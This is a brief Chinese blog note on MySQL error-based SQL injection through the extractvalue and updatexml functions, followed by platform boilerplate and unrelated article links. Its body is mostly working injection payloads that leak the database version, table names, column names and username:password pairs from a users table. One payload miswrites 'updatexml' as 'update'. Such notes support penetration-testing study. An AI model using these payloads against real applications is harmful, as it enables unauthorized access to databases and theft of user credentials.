SQL注入笔记-updatexml与extractvalue

0x1介绍

MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数

EXTRACTVALUE(XML_document, XPath_string);
UPDATEXML(XML_document, XPath_string, new_value);

两个函数的返回长度有限,均为32个字符长度

0x2注入

Payload:

or extractvalue(1, concat(0x7e, version())) or ''
or update(1, concat(0x7e, version()), 1) or ''

0x3提取数据:

爆表名:

or extractvalue(1, concat(0x7e, (select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1))) or ''

爆字段名:

or extractvalue(1, concat(0x7e, (select concat(column_name) from information_schema.columns where table_name='users' limit 0,1))) or ''

爆数据:

or extractvalue(1, concat(0x7e, (select concat_ws(':', username, password) from users limit 0,1))) or ''

updatexml的注入方式也是一样的

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • MySQL(2)数据库对象与应用
    MySQL数据库对象与应用 2.1-MySQL数据类型 库建立好之后基本不动,和我们接触最频繁的是表. 建表就是声...
    极客圈阅读 2,176评论 0 8
  • SQLMap用户手册【超详细】
    http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,442评论 2 22
  • Android杂谈:源码下载小结
    Android源码下载都是老生常谈了,这个纯碎是纪录一下。 下载repo工具 repo其实就是一个能够下载多个gi...
    我在等你回复可你没回阅读 847评论 5 2
  • 大寒
    20号是大寒。 所谓大寒,物極必反,寒至無復加也。 从明日起,节气的新的轮回了。 坚冰深处春水生 一番风雨待花开。...
    白猫米阅读 211评论 0 0
  • 2018―事业篇
    2017年转眼已到年尾岁末。2018即将到来,企业的内外环境越来越难,原因生意难做了,客户少了。对我们已转型的...
    蔡斌007阅读 138评论 0 0